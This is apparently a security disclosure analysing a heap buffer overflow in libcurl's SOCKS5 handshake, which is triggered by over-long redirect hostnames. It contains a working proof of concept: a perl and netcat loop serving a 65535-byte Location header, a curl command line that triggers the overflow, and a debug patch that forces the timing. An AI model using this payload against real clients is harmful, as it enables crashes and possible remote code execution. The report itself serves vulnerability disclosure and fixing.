The SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:
libcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames larger than 255 but will not due to a state machine bug.
For example tor user running libcurl app with follow location that connects to rogue onion server that replies with payload in Location:
header which causes crash or worse.
do_SOCKS
initializes local variable socks5_resolve_local
depending on the CURLPROXY_
name. There are two relevant names for this state machine:
CURLPROXY_SOCKS5
(SOCKS5 with local resolve of dest host)CURLPROXY_SOCKS5_HOSTNAME
(SOCKS5 with remote resolve of dest host) bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;
For this scenario, CURLPROXY_SOCKS5_HOSTNAME
is the name and socks5_resolve_local
is initialized FALSE.
The do_SOCKS
state machine is entered for the first time for the connection. sx->state
is CONNECT_SOCKS_INIT
(which happens to be the first label). In that state the hostname length is checked and if too long to resolve remotely (>255) then it sets socks5_resolve_local
to TRUE.
/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}
The local variable socks5_resolve_local
is changed but, because this is a state machine, subsequent calls to do_SOCKS
are in a different state and do not make the same change. ==This is the bug.==
For this scenario, the hostname is longer than 255 characters and do_SOCKS
is on a subsequent call, which means socks5_resolve_local
remains FALSE. This can happen by chance or be forced by an attacker.
The client “hello” SOCKS packet contains available methods and is sent to the server. State CONNECT_SOCKS_READ_INIT
=> CONNECT_SOCKS_READ
is entered to parse the server “hello” packet (method selection reply). The server has not yet replied so do_SOCKS
returns CURLPX_OK
.
CONNECT_SOCKS_READ_INIT:
case CONNECT_SOCKS_READ_INIT:
sx->outstanding = 2; /* expect two bytes */
sx->outp = socksreq; /* store it here */
/* FALLTHROUGH */
case CONNECT_SOCKS_READ:
presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
"initial SOCKS5 response");
if(CURLPX_OK != presult)
return presult;
else if(sx->outstanding) {
/* remain in reading state */
return CURLPX_OK;
}
else if(socksreq[0] != 5) {
failf(data, "Received invalid version in initial SOCKS5 response.");
return CURLPX_BAD_VERSION;
}
else if(socksreq[1] == 0) {
/* DONE! No authentication needed. Send request. */
sxstate(sx, data, CONNECT_REQ_INIT);
goto CONNECT_REQ_INIT;
}
On a subsequent call do_SOCKS
is in the same state where it’s waiting for the initial server reply. If the reply is valid, and in this scenario it is, then the state machine will goto CONNECT_REQ_INIT
which will goto CONNECT_RESOLVE_REMOTE
since socks5_resolve_local
is FALSE.
CONNECT_REQ_INIT:
case CONNECT_REQ_INIT:
if(socks5_resolve_local) {
enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port,
TRUE, &dns);
if(rc == CURLRESOLV_ERROR)
return CURLPX_RESOLVE_HOST;
if(rc == CURLRESOLV_PENDING) {
sxstate(sx, data, CONNECT_RESOLVING);
return CURLPX_OK;
}
sxstate(sx, data, CONNECT_RESOLVED);
goto CONNECT_RESOLVED;
}
goto CONNECT_RESOLVE_REMOTE;
In CONNECT_RESOLVE_REMOTE
the hostname is copied into the socksreq buffer. The code assumes the hostname is <= 255 characters which as discussed above is not guaranteed.
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
infof(data, "SOCKS5 connect to %s:%d (remotely resolved)",
sx->hostname, sx->remote_port);
socksreq
points to the temporary download buffer (ie data->state.buffer
) which was repurposed to send/receive the SOCKS negotiation since the transfer is not yet downloading.
If the size of the hostname exceeds the remaining size of the buffer then there is a buffer overflow. If the size of the hostname maxes out but does not exceed the remaining size then there is an overflow when the buffer is next written to.
Regardless, at this point we know from checks beforehand that hostname length is shorter than 65535 (MAX_URL_LEN
) and the full size of buffer is at least data->set.buffer_size + 1
.
else if(strlen(data->state.up.hostname) > MAX_URL_LEN) {
failf(data, "Too long host name (maximum is %d)", MAX_URL_LEN);
return CURLE_URL_MALFORMAT;
}
CURLcode Curl_preconnect(struct Curl_easy *data)
{
if(!data->state.buffer) {
data->state.buffer = malloc(data->set.buffer_size + 1);
data->set.buffer_size
varies. Before the allocation above, libcurl has set data->set.buffer_size
to a default 16384 (see READBUFFER_SIZE
aka CURL_MAX_WRITE_SIZE
) which could have been overridden by the user via CURLOPT_BUFFERSIZE
. A significant example of this is the curl tool uses CURLOPT_BUFFERSIZE
to set the size to its own default 102400, or user setting from --limit-rate
if that value is smaller than 100k.
The two buffer size configurations that are likely widely used are 16384+1 for libcurl apps without CURLOPT_BUFFERSIZE
and 102400+1 for curl tool commands without a low --limit-rate
. For the former the buffer can be overflowed and for the latter it can’t: 16384+1 < 65535 < 102400+1.
The characters that are allowed for hostname depend on if libcurl was built with IDN support. If it was built with IDN support then as long as the hostname contains characters < 0x80 no IDN conversion is attempted. For the higher value characters it seems very unlikely they would pass through but would depend on the IDN library. Without IDN support the characters pass through. For example Location: http://\xff\r\n
will pass through without IDN.
bool Curl_is_ASCII_name(const char *hostname)
{
/* get an UNSIGNED local version of the pointer */
const unsigned char *ch = (const unsigned char *)hostname;
if(!hostname) /* bad input, consider it ASCII! */
return TRUE;
while(*ch) {
if(*ch++ & 0x80)
return FALSE;
}
return TRUE;
}
#ifdef USE_IDN
/* Check name for non-ASCII and convert hostname if we can */
if(!Curl_is_ASCII_name(host->name)) {
char *decoded;
CURLcode result = idn_decode(host->name, &decoded);
The attacker needs to control the hostname. For example, the user has set CURLOPT_FOLLOWLOCATION
(--location
for the curl tool) so that libcurl will follow redirects. The attacker would need control of the hostname in the location header.
The attacker needs the state machine to be delayed, as discussed earlier. For example, the attacker controls the SOCKS server and delays the initial server hello.
The attacker probably needs to know how large data->set.buffer_size
is and how the memory is typically allocated, like what comes after data->state.buffer
in the heap. For example, the attacker has a copy of the program that is using libcurl and can debug it in a similar environment.
Unhandled exception at 0x6e1557be (libcurld.dll) in curld.exe: 0xC0000005: Access violation reading location 0x41414141.
Refer to attached screenshot Capture.PNG.
HEAP[curld.exe]: Heap block at 005F8200 modified at 005FC22D past requested size of 4025
Note 4025 is in hex, in decimal it is 16421 which is 16384+1+heap guard bytes.
while true; do { perl -e 'print ("HTTP/1.1 301 Moved\r\nContent-Length: 0\r\nConnection: Close\r\nLocation: http://");print("A"x65535);print("\r\n\r\n")'; sleep 2; } | nc -4l [yourip] 8000; done
start a socks5 server on remoteip (for the latency) and run curl repeatedly until it reads from 0x41414141 (AAAAA…)
curl -v --limit-rate 16384 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000
if making the socks server remote doesn’t work for latency you’d have to modify its source or force it via libcurl source
case CONNECT_SOCKS_READ:
+ {
+ static bool x = 0;
+ if(++x == 2)
+ return CURLPX_OK;
+ }
presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
"initial SOCKS5 response");
Refer to attached patch curl_security_fix.patch. It fixes the issue by changing the remote resolve check to return error CURLPX_LONG_HOSTNAME
if dest host is larger than 255.
If the state machine is not delayed and works as intended then the resolution is made locally, which in my opinion a privacy violation because a local DNS query could possibly deanonymize a user who specifically requests socks5h. In my solution patch I do not allow it.
If the state machine is delayed then the resolution is made remotely with a malformed SOCKS packet. The attacker has written to the heap and likely overwritten in-use data that come after data->state.buffer
. It’s undefined behavior at best and possible RCE at worst.
I think if libcurl was built with IDN support then the worst case is much harder to achieve because only certain bytes can be in the hostname.